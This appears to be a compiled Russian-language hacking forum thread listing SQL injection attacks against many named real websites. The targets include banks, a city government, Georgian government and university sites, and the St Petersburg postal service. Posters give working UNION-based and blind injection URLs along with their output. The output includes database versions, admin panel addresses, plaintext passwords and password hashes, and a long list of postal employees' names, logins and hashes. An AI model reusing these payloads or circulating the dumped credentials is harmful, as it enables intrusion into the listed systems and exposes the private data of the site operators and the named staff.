Федеральное Государственное Унитарное Предприятие "Российская Телевизионная и Радиовещательная Сеть" Code: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1) Code: Conversion failed when converting the nvarchar value '[B]frontcontent[/B]' to data type int. Проверил все таблы Понравилась только users Code: Conversion failed when converting the nvarchar value '[B]login[/B]' to data type int. Code: Conversion failed when converting the nvarchar value '[B]password[/B]' to data type int. Code: fc_admin frontier В итоге вот все юзеры: Code: fc_admin:frontier rtrs-editor:VMc2r7k dmitry:karakyli ivelum_KVP:D7KAK8I ivelum_LPP:0XEzzv BolotovaE:HarryPotter ivelum_YME:moscow5 ivelum_mcsim:M2CRqk3X rtrs-Olga:HttfR76m0b Val: Sob:qwertyui От чего юзеры незнаю,т.к. нашел только форум и webmail на сайте.
Database Version: 4.1.24-standard-log Database name: Sql78767_1 User name: [email protected] Database Version: 5.0.45 Database name: melbwireless User name: melbwireless@localhost Вытаскивать из phpbb_users Login: admin Pass: 72962abe4c51edd08b7a1c299a327994 : ??? Админка: http://melbourne.wireless.org.au/admin/
bankofasia.com.np Database Version: 4.1.22 Database name: bankofasiadb User name: bankofasiausr@localhost Code: http://www.bankofasia.com.np/news-events/newsDetails.php?id=-16+union+Select+1,2,3,concat(username,0x3a,password),5,6,7+from+login bankofthejames.com Database Version: 5.0.75 Database name: bankofthejames User name: [email protected] Code: http://www.bankofthejames.com/news.php?id=-29+union+Select+1,2,3,4,5,6,7,concat(username,0x3a,password),9,0,1,2+from+cms_users greenroofs.com Database Version: 4.0.27-standard Database name: db207579874 User name: dbo207579874@localhost Code: http://www.greenroofs.com/projects/pview.php?id=-663+union+select+1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users rbeurope.org Database Version: 5.0.70 Database name: bazaerb7 User name: bazaerb7@localhost Code: http://www.rbeurope.org/afiseaza.php?id=-32+union+select+1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+users+limit+1,1
rsc.ca SQL - Code: http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,2,3,4,5+--+ Инклуд(3 символа=\ варианта нет) в 3 поле и вывод во 2... Code: http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5+--+ rsc@localhost:rsc:4.0.27
Code: http://oyuniitulga.mn/index.php?com=news&catid=1&newsid=24+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10+limit+1,1 version():5.0.67.d7-ourdelta-log database():dbotulga user():[email protected]
site: (http://www.blackknight.ca) SQL - Code: http://www.blackknight.ca /products.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- [email protected] : website_en_blackknight_ca : 4.0.27-standard Code: http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- Admin (table : user) admin:4dm1n Code: http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),concat(login,0x3a,passwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users--
http://www.ssmu.edu.ge уязвим для sql-injection http://www.ssmu.edu.ge/t.php?lang=eng&id=5%27+and+0+union+select+1,2,3,4,5,concat_ws(0x3a,user,password),7,8,9+from+user+limit+0,1+--+ Список пользователей и их паролей. Версия БД: 4.1.22-standard-log Имя БД: ssmuedug_ssmu Пользователь БД: ssmuedug_ssmu@localhost Доступа к mysql.user нет. Прав на чтения файлов нет. information_schema нет( в связи с версией БД)
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,name),4,5,6,7+from+users/* ad-neWs.wixwiesbad http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,user),4,5,6,7+from+mysql.user/* 0b796e382db94bb6xroot Database Version: 4.0.24 Database name: wiesbaden User name: wiesbaden@localhost и file_priv=Y
Code: http://old.hfm-detmold.de/eti/readnews.php?id=-1+union+all+select+0,1,concat(user_id,0x3a,username,0x3a,user_password),3,4,5,6+from+phpbb_users+limit+1,1-- Узнал через сайт пасс админа форума ид/юзер/пасс: Code: 2:matthias:acbb7f96c230e9549ed3f8b7b191e519 Сам форум нахадится по урлу: http://old.hfm-detmold.de/eti/phpBB2/ --------------------------- The End!
Почта Санкт-Петербурга и Ленинградской области Code: <!--<h1>spbpost_db:spbpost@localhost:5.1.30</h1>--> Очень хитрожопая скуля,ели добился вывода,выводит закрытую в комментарий поэтому смотреть в исходник страницы Code: users Code: username password fullname и через лимит: Code: УФПС - ВАСИЛЬЕВ Е. И.:eivasilev:5971581a61e98b89 УФПС - Верендякин Д. А.:daverendyakin:249619d82c53899e УФПС - Денисенко А. И.:aidenisenko:4de93a382c1cefbd УФПС - Казимирчак Н. Б.:nbkazimirchak:4133e8c4145182ea УФПС - Квашко Н. В.:nvkvashko:56c61a2e1f8fcf6d: УФПС - Кушнирова Д. К.:dkkushnirova:0cb70d5b6ee6a28d: УФПС - Кушниров К. Д.:kdkushnirov:60073dec39882935: УФПС - НОВИКОВА О. В.:ovnovikova:5ed106ab23566a7d УФПС - СЕМЁНОВ С. А.:sasemenov:31228363100e514f УФПС - СТЁПИН Е. Г.:egstepin:19bf3d905e058879 УФПС - ФИЛАНТ Ю. Н.:yunfilant:188a1ea044b9e97c: УФПС - ХИБЛИНА Д. О.:dohiblina:7627ea600ca34984: Моск - Белан А. В.:avbelan:56c61a2e1f8fcf6d Моск - Зайцев В. Б.:vbzaicev:1558f95336ddc01a: Моск - Зосимов А.А.:aazosimov:0cccf40a49afde1d Московский - Колыхалов К.Г:kgkolihalov:48c0557a3364c17f: Моск - Пахомов А.Е.:aepahomov:42b5c9c41cdde822: Моск - Рыжов А.Ю.:ayurijov:42b5c9c41cdde822: Петрогр - Захаров С.В.:svzaharov:74a467fd5f50ba32 Петрогр - Пантюхов Л.В.:lvpantyuhov:249619d82c53899e: Петрогр - Гегелева О.Д.:odgegeleva:1b1bce234ccb7977: Петрогр - Патрин С.В.:svpatrin:42b5c9c41cdde822: Петрогр - Андреев Д.М.:dmandreev:42b5c9c41cdde822 Петрогр - Чебыкин Д.С.:dschebikin:360039a131e12ba4: Красног - Стрекалов Е.С.:esstrekalov:74ab9fc96d996910: Красног - Андреева О.Ю.:oyuandreeva:31228363100e514f: Красног - Сапрыкн С.Г.:sgsaprikin:42b5c9c41cdde822: Красног - Иванов А.П.:apivanov:42b5c9c41cdde822 Красног - Ковалёв И.В.:ivkovalev:42b5c9c41cdde822: Красног - Власов А.В.:avvlasov:3945ee27485d1be7: Красног - Бушкевич В.А:vabushkevich:5d4e81cd6a5cee2d: Красног - Буланов Ю.В.:yuvbulanov:42b5c9c41cdde822: Красног - Петров И.М.:impetrov:5419209c7109682d: Краснос - Курдюмов В. О.:vokurdyumov:3c53f6f0259384e7: Краснос - Филатов Е. Н.:enfilatov:10e71cf53618b80e: Пушк - Войтов А.Г.:agvoitov:69e56291380af837: Пушк - Королев К.А.:kakorolev:36e38078653714a2 Пушк - Васильев С.А.:savasilev:459d78f677e83e0e Пушк - Бондарчук Г.С.:gsbondarchuk:49af13841472f1c9: Сестрор - Выжлов А. Н.:anvijlov:7f11c3ed3c0215bc: СПБПочт - Александрова А.Н.:analexandrova:343f43ab46a63bb3 СПБПочт - Байкова Г.Н.:gnbaykova:3841a56150fb0ffe СПБПочт - Шелудяева Ю.А.:yuasheludyaeva:14e97246581da732: СПБПочт - Макаров Д.В.:dvmakarov:00c36ac01f7eb0e4 СПБПочт - Лескович В.В.:vvleskovich:25bcc4d8285a70e6 СПБПочт - Сонина Л.И.:lisonina:1ebef14a0d5b88fa: СПБПочт - Сергеев А.А.:aasergeev:440f30047bdce88f: СПБПочт - Бакаева С.С.:ssbakaeva:5792afc75549b813: СПБПочт - Семенова С.И.:sisemenova:05a25cd57ac0a70f: СПБПочт - Крушкина О.И.:oikrushkina:37fda15d52021b47: Инна Гайда:inna:best: УФПС - Балалайкин А. А.:aabalalaykin:21ddb5210ad35254: УФПС - РАСТЕГАЕВ Д. В.:dvrastegaev:68a4d8e470aad708: Моск - Цвирко И.Н:incvirko:418d2e19518fd5a1: Петрогр - Белов А.А.:aabelov:10b42b7c62952d6b: Красног - Коренев К.А:kakorenev:56ef67c845d53402: Краснос - Веселовский Д. А.:daveselovskiy:6450bf303fbef463: Пушк - Скирда С.А.:saskirda:08803541792dd5a5: Сестр - Заграничный Ю. Е.:yuezagranichiy:2981663432c7d6e8: СПБПочт - Рыбак Н.В.:nvribak:5be14dc352d5cccb: Андрей Гурский:andi:santitimes: админка:http://spbpost.ru/admin/
Ещё одна слепая скуля на хакере =) http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+1=1-- ----добавка--- http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+77=ascii(substring (@@version,1,1))-- вот так - с запросом, чтобы не писали, в репу, что мол не скуля там. Скуля-скуля, ка и описал выше - блинд
http://top.zenon.net/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.biz.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.cooking.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.travel.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.magelan.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.anekdot.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://www.toptop.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.lgg.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.auto.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8 http://top.rosmebel.com/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
<<Большая Экономическая библиотека>> Code: http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,0,1,2,3,4--+ 5.0.27*:*economics*:*usmdi@localhost*:*redhat-linux-gnu table: xmb_members db: corporation log: Admin pass: 86b7c7f6dd33661e19a89cf6b1253197 ): +limit+x,x--+ tables where: like+'password'--+ Code: http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+table_name,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.columns+where+column_name+like+'password'+limit+0,1--+
DB Version: 5.0.27-log DB Name: wanderlustlive DB User: wanderlustlive@localhost Admin data: ellion:zak2bRaP:[email protected] PR: 6 DB Version: 4.0.20a-nt DB Name: fnv DB User: smali@localhost PR: 6 DB Version: 5.0.67-community DB Name: michael_michaelstewart DB User: michael_kanx197@localhost Admin data: Admin: DBAdmin / Marco:Monteiro PR: 6 DB Version: 4.1.22-standard-log DB Name: rr_main DB User: [email protected] PR: 6
http://www.rs.kljb.de/display.php?idcnt=58&idver=-155+union+select+1,2,3/* Database Version: 4.1.24 Database name: usrdb_kljduqls User name: kljduqls@localhost
<<"Дарья Данцова"Официальный сайт>> Code: http://www.dontsova.ru/view_press.php?id=-38'+union+select+1,2,3,4,5,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),7,8,9,0,1,2,3--+ 4.0.21-standard-log*:*www_dontsova_ru*:*[email protected]*:*unknown-linux Code: http://www.dontsova.ru/site_admin ------------------------------------------- -=\|sql-blind|/=- <<студия Интернет рекламы>> Code: http://12kb.ru/one_article.php?id=99999+and+ascii(substring(version(),1,1))=53--+ Code: http://12kb.ru/admin/
Скуля на http://www.eu-integration.gov.ge Список таблиц. http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(table_name+as+binary)+from+information_schema.tables+--+ Поля таблицы user. http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(column_name+as+binary)+from+information_schema.columns+where+table_name=0x75736572+--+ Список пользователей-паролей. http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,concat_ws(0x3a,cast(username+as+binary),cast(password+as+binary))+from+user+--+ Версия БД: 5.0.77 Ось: portbld-freebsd6.3 Имя БД: euinteg_euinteg Рабочая папка БД: /var/db/mysql/ Пользователь БД: euinteg_euint@localhost Прав на чтения файлов нет, доступа к mysql.user нет.
